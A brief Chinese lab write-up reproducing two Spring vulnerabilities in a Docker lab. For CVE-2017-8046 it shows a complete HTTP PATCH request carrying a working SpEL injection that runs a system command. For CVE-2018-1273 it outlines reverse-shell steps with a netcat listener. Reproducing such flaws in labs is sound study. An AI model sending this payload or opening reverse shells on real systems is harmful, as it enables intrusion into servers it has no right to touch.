Spring漏洞再现
一、CVE-2017-8046
1、开环境
2、访问目录
/customers/1
3、在当前页抓包,并修改数据包
PATCH /customers/1 HTTP/1.1
Host: 150.158.199.164:8080
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 200
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]
4、进入容器,查看命令是否执行
查看容器id:docker ps
进入容器:docker exec -it 容器的id /bin/base
输入命令ls /tmp
二、CVE-2018-1273
1、开环境
2、访问目录
/users
3、抓包
填写注册信息,抓包
修改信息
4、进入容器执行命令
5、反弹shell
在服务器写一个shell文件
让靶机执行脚本
开启监听,并执行脚本
开启监听:nc -lvvp 6666
执行脚本:/bin/bash /tmp/shell.sh
成功监听